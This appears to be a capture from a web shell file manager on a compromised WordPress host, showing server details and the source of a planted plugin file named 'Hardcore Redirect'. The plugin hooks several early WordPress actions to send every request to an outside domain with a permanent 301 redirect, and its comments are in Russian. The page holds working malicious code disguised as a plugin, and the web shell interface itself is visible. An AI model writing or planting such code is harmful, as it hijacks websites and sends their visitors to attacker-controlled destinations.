HEX
Server: Apache
System: Linux p3plzcpnl489526.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: vmasmheia229 (9244908)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/vmasmheia229/domains/blog.theomggroup.com/html/wp-content/plugins/rex4/re.php
<?php
/*
Plugin Name: Hardcore Redirect
Description: Жесткий редирект ВСЕХ запросов
Version: 1.0
*/

function hardcore_redirect() {
    header("Location: https://eset-black.xyz/", true, 301);
    exit();
}

// Хук на самой ранней стадии
add_action('muplugins_loaded', 'hardcore_redirect', 1);

// Дублирующий хук на случай если первый не сработает
add_action('plugins_loaded', 'hardcore_redirect', 1);
add_action('template_redirect', 'hardcore_redirect', 1);